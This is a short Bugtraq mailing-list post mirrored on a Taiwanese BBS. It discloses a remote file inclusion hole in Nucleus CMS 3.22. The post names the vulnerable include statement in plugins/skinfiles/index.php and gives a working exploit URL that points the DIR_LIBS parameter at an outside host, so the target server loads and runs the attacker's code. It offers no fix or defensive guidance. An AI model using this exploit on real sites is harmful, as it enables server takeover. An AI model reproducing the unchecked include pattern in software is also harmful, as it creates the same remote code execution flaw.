看板 Bugtraq 關於我們 聯絡資訊
發信人alijsb@yahoo.com,
看板Bugtraq
標 題nucleus 3.22 >> RFI
發信站NCTU CSIE FreeBSD Server (Thu Apr 26 14:00:21 2007)
轉信站ptt!FreeBSD.csie.NCTU!not-for-mail
VENDOR :http://nucleuscms.org/ BY : s3rv3r_hack3r (hackerz.ir admin) bug: nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php'); Exloit: http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell